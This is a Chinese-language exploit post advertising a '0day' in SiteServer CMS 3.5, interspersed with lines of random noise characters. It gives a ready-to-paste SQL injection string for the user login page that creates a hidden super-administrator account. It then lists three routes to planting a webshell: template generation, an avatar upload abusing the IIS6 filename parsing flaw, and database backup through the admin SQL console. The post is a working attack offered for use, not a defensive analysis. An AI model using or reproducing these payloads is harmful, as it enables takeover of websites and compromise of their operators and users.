SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

stieserver官网:www.siteserver.cn
6 v1 }9 v1 F; V) m
4 A' }, X  M+ u+ ^

7 M/ R/ x2 y; @( LEXP:
/ |5 `( M! w' F( Y+ |+ N2 k: W
$ X7 U8 n% F5 f. a: ?" I1 R直接访问UserCenter/login.aspx
/ U* _/ d: o/ a3 v/ E  W

8 P* K1 i+ J* n8 g
用户名处输入：
$ ?& M' ?) \6 b! L. b
3 ]9 P# c) F/ A0 j3 J7 q: D123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--


+ i8 o4 G8 `7 e  G" e
( S$ e. N) t+ Z  M密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。



) V  U" Y: A  y, C$ t之后再访问后台SiteServer/login.aspx用插入的用户登陆

  X/ b3 V3 L9 A* x  D
* G  U6 z- ?- x8 m& c* E
后台拿webshell的三种方法：
' K% J7 W% j# c( `4 A6 x+ k
一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

$ e- s  Q8 j8 f% y二、
/ [6 u$ o: U+ J
成员权限-》添加用户-》用户名为：1.asp
. P; o- l$ M, {" ]- D
1 F! W. R7 c- i/ M/ N! whttp://127.0.0.1/usercenter/
, N9 z* x& S/ `7 E* A
用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）
1 T# I* B* W5 g) x( ~: i: L# y
4 K( K  t" Z$ h/ `4 l三、
& P1 x: d8 N0 V3 R3 C, `
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
/ x. c7 J* W" {; G& G+ o6 ^. |0 P
系统工具-》数据库工具-》SQL语句查询
7 }0 W5 T" D" [1 ^这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
; @, ]5 m8 G# y" E$ ~
( E$ r" K) ^( J  N% U